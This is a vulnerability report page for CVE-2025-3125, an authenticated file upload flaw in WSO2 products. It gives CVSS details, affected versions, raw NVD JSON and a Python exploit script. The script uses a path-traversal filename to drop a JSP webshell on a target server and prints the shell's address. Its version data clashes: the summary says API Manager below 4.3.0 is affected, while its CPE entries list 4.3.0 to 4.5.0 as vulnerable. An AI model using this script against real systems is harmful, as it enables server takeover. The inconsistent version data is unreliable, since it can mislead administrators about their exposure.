Security Vulnerability Report
CVE-2025-3125 CVSS 6.7 MEDIUM

CVE-2025-3125

Published: 2025-11-05 15:15:34
Last Modified: 2025-12-04 21:06:47
Source: ed10eef1-636d-4fbe-9993-6890dfa878f8

Description

An arbitrary file upload vulnerability exists in multiple WSO2 products due to improper input validation in the CarbonAppUploader admin service endpoint. An authenticated attacker with appropriate privileges can upload a malicious file to a user-controlled location on the server, potentially leading to remote code execution (RCE). This functionality is restricted by default to admin users; therefore, successful exploitation requires valid credentials with administrative permissions.

CVSS Details

CVSS Score: 6.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:wso2:api_control_plane:4.5.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wso2:api_manager:3.2.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wso2:api_manager:3.2.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wso2:api_manager:4.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wso2:api_manager:4.1.0:-:*:*:*:*:*:* - VULNERABLE
WSO2 API Manager < 4.3.0
WSO2 Identity Server < 7.1.0
WSO2 Enterprise Integrator < 7.2.0
WSO2 Open Banking AM < 3.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-3125 PoC - WSO2 CarbonAppUploader Arbitrary File Upload
# Target: WSO2 products with CarbonAppUploader admin service

def upload_payload(target_url, username, password, payload_path):
    """
    Upload malicious file via CarbonAppUploader endpoint
    """
    # Construct upload endpoint URL
    upload_url = f"{target_url}/services/CarbonAppUploader"

    # Prepare malicious file content (e.g., JSP webshell)
    with open(payload_path, 'r') as f:
        payload_content = f.read()

    # Construct multipart form data
    files = {
        'filename': ('..\\..\\..\\webapps\\ROOT\\shell.jsp', payload_content),
    }

    # Authentication headers
    auth = (username, password)

    try:
        # Send upload request
        response = requests.post(upload_url, files=files, auth=auth, verify=False, timeout=30)

        if response.status_code == 200:
            print("[+] File uploaded successfully!")
            print(f"[+] Access payload at: {target_url}/shell.jsp")
            return True
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <payload_file>")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    payload = sys.argv[4]

    upload_payload(target, user, pwd, payload)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-3125", "sourceIdentifier": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "published": "2025-11-05T15:15:33.953", "lastModified": "2025-12-04T21:06:46.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file upload vulnerability exists in multiple WSO2 products due to improper input validation in the CarbonAppUploader admin service endpoint. An authenticated attacker with appropriate privileges can upload a malicious file to a user-controlled location on the server, potentially leading to remote code execution (RCE).\n\nThis functionality is restricted by default to admin users; therefore, successful exploitation requires valid credentials with administrative permissions."}], "metrics": {"cvssMetricV31": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:wso2:api_control_plane:4.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "DEEA7DB5-BBF7-44A4-9FB6-0D235A44C680"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E31E32CD-497E-4EF5-B3FC-8718EE06EDAD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "B58251E8-606B-47C8-8E50-9F9FC8C179BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "E21D7ABF-C328-425D-B914-618C7628220B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "51465410-6B7C-40FD-A1AB-A14F650A6AC8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "851470CC-22AB-43E4-9CC6-5E22D49B3572"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "9EBAB99E-6F0F-4CE9-A954-E8878826304C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "0B3E6207-B2CF-487C-9CB8-906248B665C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "D47B760D-5418-4FB0-88F0-3F78BAFF63E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:enterprise_integrator:6.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "E4A07C73-3E6B-4CF9-BEB9-39C6081C0332"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4F126CA-A2F9-44F4-968B-DF71765869E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.11.0:*:*:*:*:*:*:*", "matchCriteriaId": "2153AECE-020A-4C01-B2A6-F9F5D98E7EBE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:6.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "32CE7893-AD1A-49E5-BD1A-5E9C2DEB8764"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:6.1.0:-:*:*:*:*:*:*", "matchCriteriaId": 
"EA76533A-5BED-4BDC-B348-EB3D3FDFB110"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:7.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "C1EFBD0F-9664-4EF3-9908-C72B1318F68F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server_as_key_manager:5.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "6BB34405-A2F1-461A-B51B-E103BB3680A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:open_banking_iam:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7C241A3-8EA0-41E4-ABF3-21B9D8E7A5BE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:traffic_manager:4.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "C7413107-D7B2-49AE-AC46-52E7BFCD6ED8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:universal_gateway:4.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "61636553-C25E-44DF-93D7-EB3E1056D1DC"}]}]}], "references": [{"url": "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-3961/", "source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "tags": ["Vendor Advisory"]}]}}